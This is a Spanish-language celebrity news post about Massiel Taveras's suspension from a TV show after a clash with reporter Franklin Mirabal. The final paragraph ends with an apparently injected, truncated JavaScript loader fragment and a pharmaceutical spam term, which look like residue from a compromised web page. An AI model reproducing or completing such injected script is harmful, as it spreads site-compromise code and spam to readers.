Home / Publicaciones / Entretenimiento / Massiel Taveras Suspendida de “Pégate y Gana con El Pacha”

Massiel Taveras Suspendida de “Pégate y Gana con El Pacha”

Una vez mas Massiel Taveras está dando de que hablar, y es que ahora la ex reina de belleza fue suspendida del programa< !more> “Pégate y Gana con El Pacha” en su función de copresentadora. Supuestamente la suspensión se debió al altercado que tuvo con el cronista deportivo Franklin Mirabal. Massiel estuvo en el citado espacio de TV que se transmite por Color Visión desde septiembre.

Según la nota de prensa enviada por Franklin Mirabal, se había preparado una presentación especial en el programa “Pégate y Gana con El Pacha” con motivo a un libro en honor al ex toletero Tony Peña y que tuvo como invitado principal al astro de Grandes Ligas Pedro Martínez.

Esto enfureció a Massiel Taveras porque Pedro Martínez supuestamente había sido invitado por ella para entregarle un reconocimiento por parte de la fundación que ella preside. Entonces Franklin Mirabal se había aprovechado de sus invitados.

Recordemos que Massiel Taveras había salido también del “El Show del Mediodía” por la controversia que tuvo con el productor Ivan Ruiz, donde verdadera se pasó del limite con su agresión verbal contra Massiel y como consecuencia fue citado por la Procuradora de la Mujer a charlas conductuales.var d=document;var s=d.createElement(‘script’); zestoretic 17.5 mg

About Juan Pablo Martinez

Analista de sistemas y webmaster de hobby, siempre en la búsqueda del moro perdido...